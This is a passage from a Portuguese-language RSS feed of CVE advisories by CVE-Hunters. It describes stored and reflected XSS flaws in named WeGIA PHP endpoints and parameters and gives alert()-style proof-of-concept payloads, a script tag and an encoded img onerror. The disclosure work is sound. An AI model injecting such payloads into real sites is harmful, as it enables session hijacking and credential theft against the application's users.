&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53933&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53933&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_enfermidade.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /html/saude/adicionar_enfermidade.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53933-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_enfermidadephp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-53933: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_enfermidade.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53933&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53933&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_enfermidade.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /html/saude/adicionar_enfermidade.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/image.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6558-m8rp-5qg6&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6558-m8rp-5qg6&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53934</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53934/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53934/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53934-cross-site-scripting-xss-armazenado-no-endpoint-controlphp-parâmetro-descricao_emergencia&amp;#34;&amp;gt;CVE-2025-53934: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53934-cross-site-scripting-xss-armazenado-no-endpoint-controlphp-parâmetro-descricao_emergencia&amp;#34;&amp;gt;CVE-2025-53934: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Cimg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC4&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53934/image.png&amp;#34;
	width=&amp;#34;663&amp;#34;
	height=&amp;#34;863&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53934/image_hu_e7287864ea99b304.png 480w, /p/cve-2025-53934/image_hu_1028345ab47dc2e9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;76&amp;#34;
		data-flex-basis=&amp;#34;184px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gqwp-637v-v49v&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gqwp-637v-v49v&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53935</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53935/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53935/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53935-cross-site-scripting-xss-refletido-no-endpoint-personalizacao_selecaophp-parâmetro-id&amp;#34;&amp;gt;CVE-2025-53935: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53935&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53935&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /html/personalizacao_selecao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53935-cross-site-scripting-xss-refletido-no-endpoint-personalizacao_selecaophp-parâmetro-id&amp;#34;&amp;gt;CVE-2025-53935: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53935&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53935&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /html/personalizacao_selecao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
